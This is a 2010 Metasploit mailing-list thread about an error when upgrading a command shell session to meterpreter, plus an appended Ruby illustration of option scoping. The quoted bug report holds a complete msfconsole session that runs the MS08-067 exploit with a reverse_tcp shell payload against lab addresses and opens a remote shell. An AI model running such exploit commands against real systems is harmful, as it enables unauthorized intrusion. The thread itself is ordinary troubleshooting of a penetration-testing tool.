Metasploit mailing list archives

Re: Errors with upgrading command shell to meterpreter


From: "Joshua J. Drake" <jdrake () metasploit com>
Date: Mon, 22 Mar 2010 14:48:46 -0500

On Mon, Mar 22, 2010 at 03:17:13PM -0400, David Kennedy wrote:
When doing for example MS08-067 and setting a windows/shell/reverse_tcp,
exploiting the bug then performing sessions -u 1 causes MSF to bomb out:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(ms08_067_netapi) > set RHOST 192.168.33.130
RHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > set target 3
target => 3
msf exploit(ms08_067_netapi) > exploit -j (-z does the same error msg)
[*] Exploit running as background job.
msf exploit(ms08_067_netapi) >
[*] Started reverse handler on 192.168.33.129:4444
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.33.129:4444 ->
192.168.33.130:1041)

msf exploit(ms08_067_netapi) > sessions -u 1
[-] Session manipulation failed: You must set LPORT and LHOST for this
script to work. ["/opt/metasploit3/msf3/lib/rex/script/base.rb:58:in `run'",
"/opt/metasploit3/msf3/lib/rex/script/base.rb:41:in `run'",
"/opt/metasploit3/msf3/lib/msf/base/sessions/command_shell.rb:104:in
`execute_script'",
"/opt/metasploit3/msf3/lib/msf/ui/console/command_dispatcher/core.rb:1260:in
`cmd_sessions'",
"/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:239:in `send'",
"/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:239:in
`run_command'",
"/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:201:in
`run_single'",
"/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:195:in `each'",
"/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:195:in
`run_single'", "/opt/metasploit3/msf3/lib/rex/ui/text/shell.rb:144:in
`run'", "./msfconsole:93"]
msf exploit(ms08_067_netapi) >

David,

Try using "setg" for "LHOST" and "LPORT". This is a workaround since
the script uses the datastore from the global context rather than the
exploit context...

I have updated ticket #394 to note this specific requirement. We'll do
our best to fix it up properly in the future :)

-- 
Joshua J. Drake
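
The scoping behaviour described in the reply above, as an added example that is not part of the original thread and is not Metasploit code: a simplified two-level option store in which a script that reads only the global store cannot see values written with a module-level `set`. All class, method and constant names are hypothetical; the addresses are the ones from the session above.

```ruby
# Simplified model of two-level option scoping (constructed for illustration;
# every name here is hypothetical and none of this is framework source).

# Module-scoped store: writes stay local, reads fall back to the global store.
class ModuleStore
  def initialize(global)
    @global = global
    @local  = {}
  end

  def []=(key, value)
    @local[key] = value
  end

  def [](key)
    @local.fetch(key) { @global[key] }
  end
end

# Console with one global store and one active module store.
class Console
  attr_reader :global, :active

  def initialize
    @global = {}
    @active = ModuleStore.new(@global)
  end

  def set(key, value)    # module context only
    @active[key] = value
  end

  def setg(key, value)   # global context, visible everywhere
    @global[key] = value
  end
end

REQUIRED = %w[LHOST LPORT].freeze

# Stand-in for a session script that consults only the store it is handed.
def upgrade_script(store)
  missing = REQUIRED.reject { |k| store[k] }
  raise ArgumentError, "You must set LPORT and LHOST for this script to work." unless missing.empty?
  "#{store['LHOST']}:#{store['LPORT']}"
end

# Runs the script against the global store, as the reply says the real script does.
def attempt(console)
  upgrade_script(console.global)
rescue ArgumentError => e
  "failed: #{e.message}"
end
```

In this model a value written with `setg` is still readable from the module store through the fallback, which is why setting the options globally satisfies both the exploit and the script.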
